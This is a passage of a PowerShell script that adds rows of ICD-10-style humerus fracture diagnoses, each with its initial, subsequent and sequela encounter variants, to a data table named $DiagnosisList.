arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, left arm","Nondisplaced segmental fracture of shaft of humerus, left arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, left arm","Nondisplaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, left arm","Nondisplaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, left arm","Nondisplaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, left arm","Nondisplaced segmental fracture of shaft of humerus, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, left arm","Nondisplaced segmental fracture of shaft of humerus, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, unspecified arm","Nondisplaced segmental fracture of shaft of humerus, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, unspecified arm","Nondisplaced segmental fracture of shaft of humerus, unspecified arm, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, unspecified arm","Nondisplaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, unspecified arm","Nondisplaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, unspecified arm","Nondisplaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, unspecified arm","Nondisplaced segmental fracture of shaft of humerus, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of humerus, unspecified arm","Nondisplaced segmental fracture of shaft of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right humerus","Other fracture of shaft of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right humerus","Other fracture of shaft of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right humerus","Other fracture of shaft of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right humerus","Other fracture of shaft of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right humerus","Other fracture of shaft of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right humerus","Other fracture of shaft of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right humerus","Other fracture of shaft of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left humerus","Other fracture of shaft of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left humerus","Other fracture of shaft of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left humerus","Other fracture of shaft of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left humerus","Other fracture of shaft of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left humerus","Other fracture of shaft of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left humerus","Other fracture of shaft of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left humerus","Other fracture of shaft of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified humerus","Other fracture of shaft of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified humerus","Other fracture of shaft of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified humerus","Other fracture of shaft of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified humerus","Other fracture of shaft of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified humerus","Other fracture of shaft of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified humerus","Other fracture of shaft of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified humerus","Other fracture of shaft of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right humerus","Unspecified fracture of lower end of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right humerus","Unspecified fracture of lower end of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right humerus","Unspecified fracture of lower end of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right humerus","Unspecified fracture of lower end of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right humerus","Unspecified fracture of lower end of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right humerus","Unspecified fracture of lower end of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right humerus","Unspecified fracture of lower end of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left humerus","Unspecified fracture of lower end of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left humerus","Unspecified fracture of lower end of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left humerus","Unspecified fracture of lower end of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left humerus","Unspecified fracture of lower end of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left humerus","Unspecified fracture of lower end of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left humerus","Unspecified fracture of lower end of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left humerus","Unspecified fracture of lower end of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified humerus","Unspecified fracture of lower end of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified humerus","Unspecified fracture of lower end of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified humerus","Unspecified fracture of lower end of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified humerus","Unspecified fracture of lower end of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified humerus","Unspecified fracture of lower end of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified humerus","Unspecified fracture of lower end of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified humerus","Unspecified fracture of lower end of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of right humerus","Displaced simple supracondylar fracture without intercondylar fracture of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of right humerus","Displaced simple supracondylar fracture without intercondylar fracture of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of right humerus","Displaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of right humerus","Displaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of right humerus","Displaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of right humerus","Displaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of right humerus","Displaced simple supracondylar fracture without intercondylar fracture of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of left humerus","Displaced simple supracondylar fracture without intercondylar fracture of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of left humerus","Displaced simple supracondylar fracture without intercondylar fracture of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of left humerus","Displaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of left humerus","Displaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of left humerus","Displaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of left humerus","Displaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of left humerus","Displaced simple supracondylar fracture without intercondylar fracture of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced simple supracondylar fracture without intercondylar fracture of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Displaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus","Nondisplaced comminuted supracondylar fracture without intercondylar fracture of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of right humerus","Displaced fracture (avulsion) of lateral epicondyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of right humerus","Displaced fracture (avulsion) of lateral epicondyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of right humerus","Displaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of right humerus","Displaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of right humerus","Displaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of right humerus","Displaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of right humerus","Displaced fracture (avulsion) of lateral epicondyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of left humerus","Displaced fracture (avulsion) of lateral epicondyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of left humerus","Displaced fracture (avulsion) of lateral epicondyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of left humerus","Displaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of left humerus","Displaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of left humerus","Displaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of left humerus","Displaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of left humerus","Displaced fracture (avulsion) of lateral epicondyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Displaced fracture (avulsion) of lateral epicondyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus","Nondisplaced fracture (avulsion) of lateral epicondyle 